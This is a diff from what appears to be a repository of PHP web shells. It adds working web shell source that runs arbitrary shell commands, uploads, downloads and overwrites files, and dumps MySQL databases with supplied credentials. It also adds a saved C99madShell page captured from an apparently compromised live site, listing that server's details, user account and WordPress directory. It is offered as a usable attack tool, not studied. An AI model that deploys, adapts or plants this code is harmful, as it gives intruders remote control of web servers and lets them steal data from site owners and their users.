else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
|
||||||
|
}
|
||||||
|
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
|
||||||
|
$work_dir=str_replace('\\','/',$work_dir);
|
||||||
|
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
|
||||||
|
switch($action)
|
||||||
|
{
|
||||||
|
case 'cmd' :
|
||||||
|
{
|
||||||
|
echo($head.$pages);
|
||||||
|
?>
|
||||||
|
<form method='post' name='main_form'>
|
||||||
|
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input type=submit value='go'>
|
||||||
|
</form>
|
||||||
|
<form method=post>
|
||||||
|
<input name='cmd' type=text size=120 value='<?=str_replace('\'',''',$cmd)?>'>
|
||||||
|
<input name='work_dir'type=hidden>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
|
||||||
|
</form>
|
||||||
|
<form method=post enctype="multipart/form-data">
|
||||||
|
<input type="file" name="filename">
|
||||||
|
<input name='work_dir'type=hidden>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
|
||||||
|
</form>
|
||||||
|
<form method=post>
|
||||||
|
<input name='fname' type=text size=120><br>
|
||||||
|
<input name='archive' type=radio value='none'>without arch
|
||||||
|
<input name='archive' type=radio value='gzip' checked=true>gzip archive
|
||||||
|
<input name='work_dir'type=hidden>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
|
||||||
|
</form>
|
||||||
|
<pre>
|
||||||
|
<?
|
||||||
|
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
|
||||||
|
if(@is_dir($work_dir))
|
||||||
|
{
|
||||||
|
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
|
||||||
|
$handle=@opendir($work_dir);
|
||||||
|
if($handle)
|
||||||
|
{
|
||||||
|
while(false!==($fn=readdir($handle))){$files[]=$fn;};
|
||||||
|
@closedir($handle);
|
||||||
|
sort($files);
|
||||||
|
$not_dirs=array();
|
||||||
|
for($i=0;$i<sizeof($files);$i++)
|
||||||
|
{
|
||||||
|
$fn=$files[$i];
|
||||||
|
if(is_dir($fn))
|
||||||
|
{
|
||||||
|
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
|
||||||
|
if($winda===false)
|
||||||
|
{
|
||||||
|
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
|
||||||
|
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
|
||||||
|
printf("% 20s|% -20s",$owner['name'],$group['name']);
|
||||||
|
}
|
||||||
|
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
|
||||||
|
printf("% 20s ",@filesize($work_dir.$fn).'B');
|
||||||
|
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
|
||||||
|
}
|
||||||
|
else {$not_dirs[]=$fn;}
|
||||||
|
}
|
||||||
|
for($i=0;$i<sizeof($not_dirs);$i++)
|
||||||
|
{
|
||||||
|
$fn=$not_dirs[$i];
|
||||||
|
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
|
||||||
|
if($winda===false)
|
||||||
|
{
|
||||||
|
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
|
||||||
|
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
|
||||||
|
printf("% 20s|% -20s",$owner['name'],$group['name']);
|
||||||
|
}
|
||||||
|
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
|
||||||
|
printf("% 20s ",@filesize($work_dir.$fn).'B');
|
||||||
|
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
|
||||||
|
}
|
||||||
|
echo('</pre><hr>');
|
||||||
|
?>
|
||||||
|
<form name='list' method=post>
|
||||||
|
<input name='work_dir' type=hidden size=120><br>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='f_action' value='view' type=hidden>
|
||||||
|
</form>
|
||||||
|
<?
|
||||||
|
} else echo('Error Listing '.$e_work_dir);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
switch($f_action)
|
||||||
|
{
|
||||||
|
case 'view':
|
||||||
|
{
|
||||||
|
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
|
||||||
|
$f=@fopen($work_dir,'r');
|
||||||
|
?>
|
||||||
|
<form method=post>
|
||||||
|
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
|
||||||
|
<input name='page' value='cmd' type=hidden>
|
||||||
|
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
|
||||||
|
<input name='f_action' value='save' type=submit>
|
||||||
|
</form>
|
||||||
|
<?
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'save' :
|
||||||
|
{
|
||||||
|
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
|
||||||
|
$f=@fopen($work_dir,'w');
|
||||||
|
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
|
||||||
|
else
|
||||||
|
{
|
||||||
|
fwrite($f,$file_text);
|
||||||
|
fclose($f);
|
||||||
|
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'upload' :
|
||||||
|
{
|
||||||
|
if($work_dir=='')$work_dir='/';
|
||||||
|
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
|
||||||
|
$f=$_FILES["filename"]["name"];
|
||||||
|
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo('file is uploaded in '.$e_work_dir);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'download' :
|
||||||
|
{
|
||||||
|
$fname=isset($_POST['fname'])?$_POST['fname']:'';
|
||||||
|
$temp_file=isset($_POST['temp_file'])?'on':'nn';
|
||||||
|
$f=@fopen($fname,'r');
|
||||||
|
if(!($f)) echo('file is not exists');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$archive=isset($_POST['archive'])?$_POST['archive']:'';
|
||||||
|
if($archive=='gzip')
|
||||||
|
{
|
||||||
|
Header("Content-Type:application/x-gzip\n");
|
||||||
|
$s=gzencode(fread($f,filesize($fname)));
|
||||||
|
Header('Content-Length: '.strlen($s)."\n");
|
||||||
|
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
|
||||||
|
echo($s);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Header("Content-Type:application/octet-stream\n");
|
||||||
|
Header('Content-Length: '.filesize($fname)."\n");
|
||||||
|
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
|
||||||
|
ob_start();
|
||||||
|
while(feof($f)===false)
|
||||||
|
{
|
||||||
|
echo(fread($f,10000));
|
||||||
|
ob_flush();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'mysql' :
|
||||||
|
{
|
||||||
|
$action=isset($_POST['action'])?$_POST['action']:'query';
|
||||||
|
$user=isset($_POST['user'])?$_POST['user']:'';
|
||||||
|
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
|
||||||
|
$db=isset($_POST['db'])?$_POST['db']:'';
|
||||||
|
$host=isset($_POST['host'])?$_POST['host']:'localhost';
|
||||||
|
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
|
||||||
|
switch($action)
|
||||||
|
{
|
||||||
|
case 'dump' :
|
||||||
|
{
|
||||||
|
$mysql_link=@mysql_connect($host,$user,$passwd);
|
||||||
|
if(!($mysql_link)) echo('Connect error');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
|
||||||
|
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
|
||||||
|
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
|
||||||
|
if($archive!=='none')$to_file=false;
|
||||||
|
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
|
||||||
|
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
|
||||||
|
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
|
||||||
|
ob_start();
|
||||||
|
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
|
||||||
|
if($table_dump=='')
|
||||||
|
{
|
||||||
|
if(!$to_file)
|
||||||
|
{
|
||||||
|
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
|
||||||
|
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
|
||||||
|
}
|
||||||
|
$result=mysql_query('show tables',$mysql_link);
|
||||||
|
for($i=0;$i<mysql_num_rows($result);$i++)
|
||||||
|
{
|
||||||
|
$rows=mysql_fetch_array($result);
|
||||||
|
$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
|
||||||
|
if(!$result2)$dump_file.='#error table '.$rows[0];
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$dump_file.='create table `'.$rows[0]."`(\n";
|
||||||
|
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
|
||||||
|
}
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
|
||||||
|
$type[$j]=$rows2[1];
|
||||||
|
$dump_file.=");\n";
|
||||||
|
mysql_free_result($result2);
|
||||||
|
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
|
||||||
|
$columns=$j-1;
|
||||||
|
for($j=0;$j<mysql_num_rows($result2);$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='insert into `'.$rows[0].'` values (';
|
||||||
|
for($k=0;$k<$columns;$k++)
|
||||||
|
{
|
||||||
|
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
|
||||||
|
}
|
||||||
|
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
|
||||||
|
if($archive=='none')
|
||||||
|
{
|
||||||
|
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo($dump_file);
|
||||||
|
ob_flush();
|
||||||
|
}
|
||||||
|
$dump_file='';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
mysql_free_result($result2);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
mysql_free_result($result);
|
||||||
|
if($archive!='none')
|
||||||
|
{
|
||||||
|
$dump_file=gzencode($dump_file);
|
||||||
|
header('Content-Length: '.strlen($dump_file)."\n");
|
||||||
|
echo($dump_file);
|
||||||
|
}
|
||||||
|
else if($t_f)
|
||||||
|
{
|
||||||
|
fclose($t_f);
|
||||||
|
echo('Dump for '.$db_dump.' now in '.$to_file);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
|
||||||
|
if(!$result2)echo('error table '.$table_dump);
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(!$to_file)
|
||||||
|
{
|
||||||
|
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
|
||||||
|
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
|
||||||
|
}
|
||||||
|
if($to_file===false)
|
||||||
|
{
|
||||||
|
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
|
||||||
|
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
|
||||||
|
}
|
||||||
|
$dump_file.="create table `{$table_dump}`(\n";
|
||||||
|
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
|
||||||
|
}
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
|
||||||
|
$type[$j]=$rows2[1];
|
||||||
|
$dump_file.=");\n";
|
||||||
|
mysql_free_result($result2);
|
||||||
|
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
|
||||||
|
$columns=$j-1;
|
||||||
|
for($j=0;$j<mysql_num_rows($result2);$j++)
|
||||||
|
{
|
||||||
|
$rows2=mysql_fetch_array($result2);
|
||||||
|
$dump_file.='insert into `'.$table_dump.'` values (';
|
||||||
|
for($k=0;$k<$columns;$k++)
|
||||||
|
{
|
||||||
|
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
|
||||||
|
}
|
||||||
|
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
|
||||||
|
if($archive=='none')
|
||||||
|
{
|
||||||
|
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo($dump_file);
|
||||||
|
ob_flush();
|
||||||
|
}
|
||||||
|
$dump_file='';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
mysql_free_result($result2);
|
||||||
|
if($archive!='none')
|
||||||
|
{
|
||||||
|
$dump_file=gzencode($dump_file);
|
||||||
|
header('Content-Length: '.strlen($dump_file)."\n");
|
||||||
|
echo $dump_file;
|
||||||
|
}else if($t_f)
|
||||||
|
{
|
||||||
|
fclose($t_f);
|
||||||
|
echo('Dump for '.$db_dump.' now in '.$to_file);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
case 'query' :
|
||||||
|
{
|
||||||
|
echo($head.$pages);
|
||||||
|
?>
|
||||||
|
<hr>
|
||||||
|
<form method=post>
|
||||||
|
<table>
|
||||||
|
<td>
|
||||||
|
<table align=left>
|
||||||
|
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
|
||||||
|
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
<td>
|
||||||
|
<table>
|
||||||
|
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
|
||||||
|
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
|
||||||
|
<input name='archive' type=radio value='none'>without arch
|
||||||
|
<input name='archive' type=radio value='gzip' checked=true>gzip archive
|
||||||
|
<tr><td><input type=submit name='action' value='dump'></td></tr>
|
||||||
|
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</table>
|
||||||
|
<input name='page' value='mysql' type=hidden>
|
||||||
|
<input name='action' value='query' type=submit>
|
||||||
|
</form>
|
||||||
|
<hr>
|
||||||
|
<?
|
||||||
|
$mysql_link=@mysql_connect($host,$user,$passwd);
|
||||||
|
if(!($mysql_link)) echo('Connect error');
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
|
||||||
|
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
|
||||||
|
$result=@mysql_query($query,$mysql_link);
|
||||||
|
if(!($result))echo(mysql_error());
|
||||||
|
else
|
||||||
|
{
|
||||||
|
echo("<table valign=top align=left>\n<tr>");
|
||||||
|
for($i=0;$i<mysql_num_fields($result);$i++)
|
||||||
|
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>');
|
||||||
|
echo("\n</tr>\n");
|
||||||
|
for($i=0;$i<mysql_num_rows($result);$i++)
|
||||||
|
{
|
||||||
|
$rows=mysql_fetch_array($result);
|
||||||
|
echo('<tr valign=top align=left>');
|
||||||
|
for($j=0;$j<mysql_num_fields($result);$j++)
|
||||||
|
{
|
||||||
|
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
|
||||||
|
}
|
||||||
|
echo("</tr>\n");
|
||||||
|
}
|
||||||
|
echo("</table>\n");
|
||||||
|
}
|
||||||
|
mysql_close($mysql_link);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
BIN
php/PHPshell/【C99madShell v. 3.0】/C99madShell v. 3.0.jpg
Normal file
BIN
php/PHPshell/【C99madShell v. 3.0】/C99madShell v. 3.0.jpg
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 89 KiB |
327
php/PHPshell/【C99madShell v. 3.0】/smowu.php
Normal file
327
php/PHPshell/【C99madShell v. 3.0】/smowu.php
Normal file
@@ -0,0 +1,327 @@
|
|||||||
|
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>thecompanyart.com - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='wp_act' type='hidden' value=''><input name='wp_path' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="/wordpress/wp-xmlrpc.php"><font face="Verdana" size="5"><b>C99madShell v. 3.0 BLOG edition</b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr>
|
||||||
|
<tr><td>
|
||||||
|
<p align="left"><b>Software: Apache/2.0.52 (Red Hat)</b> </p>
|
||||||
|
<p align="left"><b>System: Linux thecompanyart.com 2.6.9-42.0.3.EL.wh1smp #1 SMP Fri Aug 14 15:48:17 MDT 2009 i686</b> </p>
|
||||||
|
<p align="left"><b>User/Group: anatandannie/vuser</b> </p><p align="left"><b>Php version: <a href="#" onclick="document.todo.act.value='phpinfo';document.todo.submit();"><b><u>5.2.6</u></b></a>
|
||||||
|
<p align="left"><b>Php modules:
|
||||||
|
<font title="libxml,xsl,xmlwriter,xmlrpc,dom,xmlreader,xml,tokenizer,session,pcre,SimpleXML,SPL,PDO,sockets,soap,SQLite,standard,Reflection,pspell,posix,pgsql,pdo_sqlite,pdo_pgsql,pdo_mysql,mysqli,mysql,mssql,mhash,mcrypt,mbstring,ldap,json,imap,iconv,hash,gmp,gettext,gd,ftp,filter,exif,dbase,dba,date,curl,ctype,calendar,bz2,bcmath,zlib,openssl,apache2handler,magickwand,Zend Optimizer">mysql, mysqli, ftp, curl, imap, sockets, mssql</font></b> </p>
|
||||||
|
<p align="left" style="color:red"><b>Disable functions: passthru, proc_open, shell_exec, system</b></p><p align="left"><b>Install program: <font color="#00CCFF"><font title="/usr/bin/php">php</font>, <font title="/usr/bin/perl">perl</font>, <font title="/usr/bin/make">make</font>, <font title="/bin/tar">tar</font>, <font title="/usr/bin/wget">wget</font>, <font title="/usr/bin/lynx">lynx</font>, <font title="/usr/bin/curl">curl</font>, <font title="/usr/bin/lwp-mirror">lwp-mirror</font>, <font title="/usr/bin/lwp-download">lwp-download</font></font></b></p><p align="left"><b>Allow_url_fopen: <font color="green">ON</font></b></p>
|
||||||
|
<p align="left"><b>Allow_url_include: <font color="red">OFF</font></b></p>
|
||||||
|
<p align="left"><b>Safe-mode: <font color=green>OFF (not secure)</font></b></p>
|
||||||
|
<p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input type="submit" value="SET PATH" onclick="document.todo.act.value='ls';document.todo.wp_path.value=document.getElementById('wp_pat').value;document.todo.submit();"></p><p align="left"><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2F';document.todo.sort.value='0a';document.todo.submit();"><b>/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2F';document.todo.sort.value='0a';document.todo.submit();"><b>var/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2F';document.todo.sort.value='0a';document.todo.submit();"><b>www/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2F';document.todo.sort.value='0a';document.todo.submit();"><b>html/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='0a';document.todo.submit();"><b>wordpress/</b></a> <b><font color=green>drwxr-xr-x</font></b><br><a href="#" onclick="document.todo.act.value='search';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.submit();"><b><hr>Search</b></a> <a href="#" onclick="document.todo.act.value='eval';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.submit();"><b>PHP-code</b></a> <a href="#" onclick="document.todo.act.value='selfremove';document.todo.submit();"><b>Self remove</b></a> </p></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><center><b>Listing folder (28 files and 4 folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name="ls_form"><input type=hidden name=act value=ls><input type=hidden name=d value=/var/www/html/wordpress/><tr>
|
||||||
|
<td><b>Name</b><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='0d;document.todo.submit();"></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='1a';document.todo.submit();"><b>Size</b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='2a';document.todo.submit();"><b>Modify</b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='3a';document.todo.submit();"><b>Owner/Group</b></a></td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='4a';document.todo.submit();"><b>Perms</b></a></td>
|
||||||
|
<td><b>Action</b></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml';document.todo.sort.value='0a';document.todo.submit();">..</a></td>
|
||||||
|
<td>LINK</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='..';document.todo.submit();">11.10.2009 12:14:52</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='..';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
|
||||||
|
<td><input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/wordpress/.."></td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.sort.value='0a';document.todo.submit();">.</a></td>
|
||||||
|
<td>LINK</td>
|
||||||
|
<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.';document.todo.submit();">14.01.2010 11:48:42</a></td>
|
||||||
|
<td>anatandannie/vuser</td>
|
||||||
|
<td> <a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
|
||||||
|
